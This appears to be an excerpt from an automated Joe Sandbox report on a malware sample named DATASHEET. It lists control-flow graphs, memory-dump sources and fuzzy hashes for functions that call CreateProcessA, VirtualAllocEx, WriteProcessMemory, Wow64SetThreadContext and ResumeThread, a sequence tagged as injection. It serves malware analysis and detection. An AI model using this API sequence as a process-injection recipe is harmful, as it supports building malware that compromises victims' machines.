                                                                                                          control_flow_graph 419 5ecca50-5eccae5 421 5eccb1e-5eccb3e 419->421 422 5eccae7-5eccaf1 419->422 429 5eccb77-5eccba6 421->429 430 5eccb40-5eccb4a 421->430 422->421 423 5eccaf3-5eccaf5 422->423 424 5eccb18-5eccb1b 423->424 425 5eccaf7-5eccb01 423->425 424->421 427 5eccb05-5eccb14 425->427 428 5eccb03 425->428 427->427 431 5eccb16 427->431 428->427 436 5eccbdf-5eccc99 CreateProcessA 429->436 437 5eccba8-5eccbb2 429->437 430->429 432 5eccb4c-5eccb4e 430->432 431->424 434 5eccb50-5eccb5a 432->434 435 5eccb71-5eccb74 432->435 438 5eccb5c 434->438 439 5eccb5e-5eccb6d 434->439 435->429 450 5eccc9b-5eccca1 436->450 451 5eccca2-5eccd28 436->451 437->436 441 5eccbb4-5eccbb6 437->441 438->439 439->439 440 5eccb6f 439->440 440->435 442 5eccbb8-5eccbc2 441->442 443 5eccbd9-5eccbdc 441->443 445 5eccbc4 442->445 446 5eccbc6-5eccbd5 442->446 443->436 445->446 446->446 448 5eccbd7 446->448 448->443 450->451 461 5eccd38-5eccd3c 451->461 462 5eccd2a-5eccd2e 451->462 463 5eccd4c-5eccd50 461->463 464 5eccd3e-5eccd42 461->464 462->461 465 5eccd30 462->465 467 5eccd60-5eccd64 463->467 468 5eccd52-5eccd56 463->468 464->463 466 5eccd44 464->466 465->461 466->463 470 5eccd76-5eccd7d 467->470 471 5eccd66-5eccd6c 467->471 468->467 469 5eccd58 468->469 469->467 472 5eccd7f-5eccd8e 470->472 473 5eccd94 470->473 471->470 472->473 474 5eccd95 473->474 474->474
                                                                                                          APIs
                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05ECCC86
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0
                                                                                                          • Opcode ID: 61d4a47587c4b094431804da70997e46aca9efedc0d1d30ba255f53fa2792d13
                                                                                                          • Instruction ID: 0b2827c88bba26c2fbf6e3a811e002681f3200d68569f11aa245ee5a81f61837
                                                                                                          • Opcode Fuzzy Hash: 61d4a47587c4b094431804da70997e46aca9efedc0d1d30ba255f53fa2792d13
                                                                                                          • Instruction Fuzzy Hash: 72916B71D002199FEB24CFA8C941BEDBFB2BF48314F1485A9E85DA7240DB749986CF91
                                                                                                          Function 02B2B130 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 476 2b2b130-2b2b13f 477 2b2b141-2b2b14e call 2b2aaf4 476->477 478 2b2b16b-2b2b16f 476->478 485 2b2b150 477->485 486 2b2b164 477->486 479 2b2b183-2b2b1c4 478->479 480 2b2b171-2b2b17b 478->480 487 2b2b1d1-2b2b1df 479->487 488 2b2b1c6-2b2b1ce 479->488 480->479 531 2b2b156 call 2b2b3ba 485->531 532 2b2b156 call 2b2b3c8 485->532 486->478 489 2b2b203-2b2b205 487->489 490 2b2b1e1-2b2b1e6 487->490 488->487 492 2b2b208-2b2b20f 489->492 493 2b2b1f1 490->493 494 2b2b1e8-2b2b1ef call 2b2ab00 490->494 491 2b2b15c-2b2b15e 491->486 495 2b2b2a0-2b2b360 491->495 496 2b2b211-2b2b219 492->496 497 2b2b21c-2b2b223 492->497 499 2b2b1f3-2b2b201 493->499 494->499 526 2b2b362-2b2b365 495->526 527 2b2b368-2b2b393 GetModuleHandleW 495->527 496->497 500 2b2b230-2b2b239 call 2b2ab10 497->500 501 2b2b225-2b2b22d 497->501 499->492 507 2b2b246-2b2b24b 500->507 508 2b2b23b-2b2b243 500->508 501->500 509 2b2b269-2b2b276 507->509 510 2b2b24d-2b2b254 507->510 508->507 516 2b2b278-2b2b296 509->516 517 2b2b299-2b2b29f 509->517 510->509 512 2b2b256-2b2b266 call 2b2ab20 call 2b2ab30 510->512 512->509 516->517 526->527 528 2b2b395-2b2b39b 527->528 529 2b2b39c-2b2b3b0 527->529 528->529 531->491 532->491
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02B2B386
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1778135065.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2b20000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule
                                                                                                          • String ID:
                                                                                                          • API String ID: 4139908857-0
                                                                                                          • Opcode ID: 3d90b156bb00b840c6d39758ce0ef8d223b846d6ca7c381158414224189463df
                                                                                                          • Instruction ID: e4d0a00ed1fc5928b9244b5ae06230504e656b7e11116e759767453fa2f56b96
                                                                                                          • Opcode Fuzzy Hash: 3d90b156bb00b840c6d39758ce0ef8d223b846d6ca7c381158414224189463df
                                                                                                          • Instruction Fuzzy Hash: 88715470A00B158FD724DF69D54575ABBF2FF88308F008A6ED08ADBA50DB74E949CB91
                                                                                                          Function 02B2590D Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 718 2b2590d-2b25914 719 2b258b1-2b258d9 718->719 720 2b25916-2b259d9 CreateActCtxA 718->720 725 2b258e2-2b25903 719->725 726 2b258db-2b258e1 719->726 723 2b259e2-2b25a3c 720->723 724 2b259db-2b259e1 720->724 734 2b25a4b-2b25a4f 723->734 735 2b25a3e-2b25a41 723->735 724->723 726->725 736 2b25a60-2b25a90 734->736 737 2b25a51-2b25a5d 734->737 735->734 741 2b25a42-2b25a4a 736->741 742 2b25a92-2b25b14 736->742 737->736 741->734 745 2b259cf-2b259d9 741->745 745->723 745->724
                                                                                                          APIs
                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 02B259C9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1778135065.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2b20000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Create
                                                                                                          • String ID:
                                                                                                          • API String ID: 2289755597-0
                                                                                                          • Opcode ID: 2b40b5460ebfb173ca3a2c3b49e898d7f8361d2cd0154d16978331c2c7c12ee7
                                                                                                          • Instruction ID: 15513fd31c3a71c461af659640aa786cdff31030f590d4229bcdfa34b9841773
                                                                                                          • Opcode Fuzzy Hash: 2b40b5460ebfb173ca3a2c3b49e898d7f8361d2cd0154d16978331c2c7c12ee7
                                                                                                          • Instruction Fuzzy Hash: B151F1B1C00729CFDB24CFA9C8857DEBBF5AF48304F2480AAD048AB251D7756989CF90
                                                                                                          Function 02B244C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 746 2b244c4-2b259d9 CreateActCtxA 749 2b259e2-2b25a3c 746->749 750 2b259db-2b259e1 746->750 757 2b25a4b-2b25a4f 749->757 758 2b25a3e-2b25a41 749->758 750->749 759 2b25a60-2b25a90 757->759 760 2b25a51-2b25a5d 757->760 758->757 764 2b25a42-2b25a4a 759->764 765 2b25a92-2b25b14 759->765 760->759 764->757 768 2b259cf-2b259d9 764->768 768->749 768->750
                                                                                                          APIs
                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 02B259C9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1778135065.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2b20000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Create
                                                                                                          • String ID:
                                                                                                          • API String ID: 2289755597-0
                                                                                                          • Opcode ID: 6e866e61f868cc52a1dd6eb971b97ebcdd132c6cb96d54e7b56e8fdf0f5b80ea
                                                                                                          • Instruction ID: bf9bb7533e4dd14608438caebedd4ffeec35e8c6c671bfc4b990ea1ff889537b
                                                                                                          • Opcode Fuzzy Hash: 6e866e61f868cc52a1dd6eb971b97ebcdd132c6cb96d54e7b56e8fdf0f5b80ea
                                                                                                          • Instruction Fuzzy Hash: 6641D2B0C0072DCBDB24DFA9C9847DDBBB5BF49304F6480AAD408AB255DB756949CF90
                                                                                                          Function 05ECC8B2 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 769 5ecc8b2-5ecc8b5 770 5ecc8a5-5ecc8b1 769->770 771 5ecc8b7-5ecc90f 769->771 770->769 773 5ecc916-5ecc945 ReadProcessMemory 771->773 774 5ecc94e-5ecc97e 773->774 775 5ecc947-5ecc94d 773->775 775->774
                                                                                                          APIs
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05ECC938
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 1726664587-0
                                                                                                          • Opcode ID: 7dffcf47c31daebd19cb5dc359c56d4240af7da4ea8bfd5bc1e901aeee00849d
                                                                                                          • Instruction ID: bc6be3fcd55c1239ae8d8ee808453f255e9a0a6bb7c733642e39d78c03585c03
                                                                                                          • Opcode Fuzzy Hash: 7dffcf47c31daebd19cb5dc359c56d4240af7da4ea8bfd5bc1e901aeee00849d
                                                                                                          • Instruction Fuzzy Hash: 5C2155B2800349DFCB10CFA9C9816EEFBF1FF48320F24846AE558A7250C7389945CBA5
                                                                                                          Function 05ECC7C0 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 779 5ecc7c0-5ecc816 781 5ecc818-5ecc824 779->781 782 5ecc826-5ecc865 WriteProcessMemory 779->782 781->782 784 5ecc86e-5ecc89e 782->784 785 5ecc867-5ecc86d 782->785 785->784
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05ECC858
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: 8e5abb33b4723688862ce68c1f07965afc042eb9c72e4f3fac8c3941e6040a15
                                                                                                          • Instruction ID: 9f605726a95b39e649e5c30335e42da5f631d0f4291075bf41e39a9a9ac38f13
                                                                                                          • Opcode Fuzzy Hash: 8e5abb33b4723688862ce68c1f07965afc042eb9c72e4f3fac8c3941e6040a15
                                                                                                          • Instruction Fuzzy Hash: EA2157B2D003499FDB10CFA9C9857EEBBF0BF48310F14846AE959A7240C778A945CBA4
                                                                                                          Function 05ECC7C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 789 5ecc7c8-5ecc816 791 5ecc818-5ecc824 789->791 792 5ecc826-5ecc865 WriteProcessMemory 789->792 791->792 794 5ecc86e-5ecc89e 792->794 795 5ecc867-5ecc86d 792->795 795->794
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05ECC858
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: 0387fc1e0242c0994045499cb2ff37fa932f930f7e35d2d82b9f952a2b109aaa
                                                                                                          • Instruction ID: 2a09183fb9b11065bc3c19a89bab09ce4df666ef640a9e6ea6ec072ec43cc68d
                                                                                                          • Opcode Fuzzy Hash: 0387fc1e0242c0994045499cb2ff37fa932f930f7e35d2d82b9f952a2b109aaa
                                                                                                          • Instruction Fuzzy Hash: A1215AB19003099FDB10CFA9C985BDEBBF5FF48314F108429E559A7240C778A945CBA4
                                                                                                          Function 05ECC1F3 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 799 5ecc1f3-5ecc243 802 5ecc245-5ecc251 799->802 803 5ecc253-5ecc283 Wow64SetThreadContext 799->803 802->803 805 5ecc28c-5ecc2bc 803->805 806 5ecc285-5ecc28b 803->806 806->805
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05ECC276
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 219db60edac0f38dbca970bac70efce10fd87fde761ddd5d59205c617cc455d0
                                                                                                          • Instruction ID: 22566ee1bf20b732117a055b540ce15c25d3fbe99eea32d0c9e99ab392b10f0f
                                                                                                          • Opcode Fuzzy Hash: 219db60edac0f38dbca970bac70efce10fd87fde761ddd5d59205c617cc455d0
                                                                                                          • Instruction Fuzzy Hash: 762137B1D003098FDB14DFAAC5857EEBFF4EB88324F14842AD459A7241C778A985CFA4
                                                                                                          Function 05ECC1F8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05ECC276
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 0a44dfcdb149cbdbc2263e3915a9e3256a08457dc26e7f935592a386bdf848d4
                                                                                                          • Instruction ID: 7cfeb2e0dc379562bdafb05ed1ee66ce76e25e0b966bb6a2df9bfd8bfdf27b02
                                                                                                          • Opcode Fuzzy Hash: 0a44dfcdb149cbdbc2263e3915a9e3256a08457dc26e7f935592a386bdf848d4
                                                                                                          • Instruction Fuzzy Hash: F92137B1D003098FDB14DFAAC5857EEBBF4EB88324F14842AD459A7240C7789985CFA4
                                                                                                          Function 05ECC8B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05ECC938
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 1726664587-0
                                                                                                          • Opcode ID: 40ddd577487bf5f87cfd8874d2582b4894ea0958d7d4ef47052985607c238d3d
                                                                                                          • Instruction ID: cc47ad49261bff39a9dbd45ef7aab2df992335eba71d1a63365095533094216e
                                                                                                          • Opcode Fuzzy Hash: 40ddd577487bf5f87cfd8874d2582b4894ea0958d7d4ef47052985607c238d3d
                                                                                                          • Instruction Fuzzy Hash: 9C2139B18003599FCB10DFAAC945ADEFBF5FF48324F14842EE559A7250C7349945CBA4
                                                                                                          Function 02B2D600 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 810 2b2d600-2b2d69c DuplicateHandle 811 2b2d6a5-2b2d6c2 810->811 812 2b2d69e-2b2d6a4 810->812 812->811
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B2D68F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1778135065.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2b20000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: 1fc7fdee9d8edfa998e36501aed69e791862ddc9a57ddeb7a718b6d86fc538f9
                                                                                                          • Instruction ID: 6c4e075939ae85a659f431749c87d7545626b7849dd5f8bf793069d082b27c31
                                                                                                          • Opcode Fuzzy Hash: 1fc7fdee9d8edfa998e36501aed69e791862ddc9a57ddeb7a718b6d86fc538f9
                                                                                                          • Instruction Fuzzy Hash: 3D21E4B59003199FDB10CFA9D584ADEBBF4FB48324F14845AE958A7310D378A954CF64
                                                                                                          Function 02B2D608 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B2D68F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1778135065.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2b20000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: c1371f8457d78700738bee2c673e098b5e941fc5b3179681cb8c54706996dae7
                                                                                                          • Instruction ID: 3d9d357c8cdbde1cac6d2d1578b92f4bb836ea6c94acd91dc8a0691aff94e0e7
                                                                                                          • Opcode Fuzzy Hash: c1371f8457d78700738bee2c673e098b5e941fc5b3179681cb8c54706996dae7
                                                                                                          • Instruction Fuzzy Hash: 2921E4B59003199FDB10CF9AD584ADEBBF4EB48324F14845AE958A7310D374A954CFA4
                                                                                                          Function 05ECBD09 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: ce5c2ee3ac9e6ce4e67e0a044c012bf95d0ec97abf1d56bcf91a335ef57442a3
                                                                                                          • Instruction ID: 60a59e37c27fd4a5cbe86411df3923cf333b9f47c7c0ec79fb55cca1cef28e98
                                                                                                          • Opcode Fuzzy Hash: ce5c2ee3ac9e6ce4e67e0a044c012bf95d0ec97abf1d56bcf91a335ef57442a3
                                                                                                          • Instruction Fuzzy Hash: 4F1167B19043888FDB24DFAAC54979EFFF4EF88324F24849EC499A7250C7399545CB94
                                                                                                          Function 05ECC700 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05ECC776
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: cedb8788d0225604fc21647850ae5b8ebb7c83c9965789c6aa716f7a45a4e106
                                                                                                          • Instruction ID: 78b25a2ba935feb315ea27dd1fb75bc43b6b2f141b5fd1e5142ff00b567b82d1
                                                                                                          • Opcode Fuzzy Hash: cedb8788d0225604fc21647850ae5b8ebb7c83c9965789c6aa716f7a45a4e106
                                                                                                          • Instruction Fuzzy Hash: 361164B2800248CFCB10CFA9C945BEEBFF5AF48324F24841AD559A7250C739A940CFA0
                                                                                                          Function 05ECC708 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05ECC776
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 89661a047d5d32fc6156352ac22a7a7ae972c72fbf13cf58ef382438257a601a
                                                                                                          • Instruction ID: 69469ea21c8d8e4e76a8fe75db99ad540b1a54a3b185adef66171b4187d826ae
                                                                                                          • Opcode Fuzzy Hash: 89661a047d5d32fc6156352ac22a7a7ae972c72fbf13cf58ef382438257a601a
                                                                                                          • Instruction Fuzzy Hash: 281167B2800248CFCB10DFAAC844BDEBFF5EF88324F248419E559A7250C735A940CFA4
                                                                                                          Function 05ECBD10 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: 336b5b2eb992a8558264529684bb20bc637ac60072116b8e9bdc057243116aa4
                                                                                                          • Instruction ID: af7a559e86685ea86dded1e9d98e95fbc8a7fe73fc291bdd904fb8b9ac05e42f
                                                                                                          • Opcode Fuzzy Hash: 336b5b2eb992a8558264529684bb20bc637ac60072116b8e9bdc057243116aa4
                                                                                                          • Instruction Fuzzy Hash: D61128B19003488BDB20DFAAC4457DEFFF4AB88324F248459D459A7250C779A545CF94
                                                                                                          Function 02B2B320 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02B2B386
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1778135065.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2b20000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule
                                                                                                          • String ID:
                                                                                                          • API String ID: 4139908857-0
                                                                                                          • Opcode ID: 80623b86c8279545afcb34fafc9b87e209c1dad04b9ff2e4c978dfcfe1e632b3
                                                                                                          • Instruction ID: a28c9f85391c69e84a48d57887a949911414b9c797178a0a86eea1a2ff48e2f3
                                                                                                          • Opcode Fuzzy Hash: 80623b86c8279545afcb34fafc9b87e209c1dad04b9ff2e4c978dfcfe1e632b3
                                                                                                          • Instruction Fuzzy Hash: B2110FB6C003598FCB10CF9AC544BDEFBF4EB88228F14846AD458A7210C375A545CFA5
                                                                                                          Function 07DB11E0 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 07DB1245
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1790232761.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7db0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost
                                                                                                          • String ID:
                                                                                                          • API String ID: 410705778-0
                                                                                                          • Opcode ID: 370b081dcecf7f6da39ce80b4d2142b58c465e8767f0876c374ec1701e072dd8
                                                                                                          • Instruction ID: a0294d5ee84d29f10a377fbf142a18d226b8db53ff6c7e35b7b84ae656b49e38
                                                                                                          • Opcode Fuzzy Hash: 370b081dcecf7f6da39ce80b4d2142b58c465e8767f0876c374ec1701e072dd8
                                                                                                          • Instruction Fuzzy Hash: 5D1103B5800349DFDB20DF9AC485BDEFBF4EB48324F14845AD559A7200C375A984CFA5
                                                                                                          Function 07DB11E8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 07DB1245
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1790232761.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7db0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost
                                                                                                          • String ID:
                                                                                                          • API String ID: 410705778-0
                                                                                                          • Opcode ID: c9e38569c92f8193beb43289cb0db1ea98b1726be36157df1fb3e0e70273db86
                                                                                                          • Instruction ID: 8811d33e52436814de3ff5cfbacc8bcec0b425da6175283c87e2e66736e53e81
                                                                                                          • Opcode Fuzzy Hash: c9e38569c92f8193beb43289cb0db1ea98b1726be36157df1fb3e0e70273db86
                                                                                                          • Instruction Fuzzy Hash: 641103B5800349DFCB20CF9AC485BDEFBF8EB48324F10845AD558A7200C375A544CFA5
                                                                                                          Function 00F7D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1777278033.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_f7d000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4ce37209d3b7c69d7a60bbefedd8c74a379a8d4eabc1b512822bea769bfb6fa6
                                                                                                          • Instruction ID: e5297f2c1a23e6cf7c9081ffe3d2553526b165c5e1e39555b204db308b9973d3
                                                                                                          • Opcode Fuzzy Hash: 4ce37209d3b7c69d7a60bbefedd8c74a379a8d4eabc1b512822bea769bfb6fa6
                                                                                                          • Instruction Fuzzy Hash: 3421D371A04204DFDB05DF14D980B26BBB5FF84324F64C56AD94D4B256C336D846DA62
                                                                                                          Function 00F7D01C Relevance: .1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1777278033.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_f7d000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
